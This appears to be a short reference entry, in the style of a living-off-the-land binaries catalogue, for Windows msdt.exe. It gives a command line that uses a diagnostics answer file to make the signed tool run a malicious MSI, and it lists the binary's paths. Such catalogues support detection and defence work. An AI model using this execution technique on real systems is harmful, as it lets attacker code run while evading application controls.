- Functions: Execute
Open .diagcab package
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
-
Resources:
-
Full path:
- C:\Windows\System32\Msdt.exe
- C:\Windows\SysWOW64\Msdt.exe
-
Notes: Thanks to: See the Payloads folder for an example PCW8E57.xml file.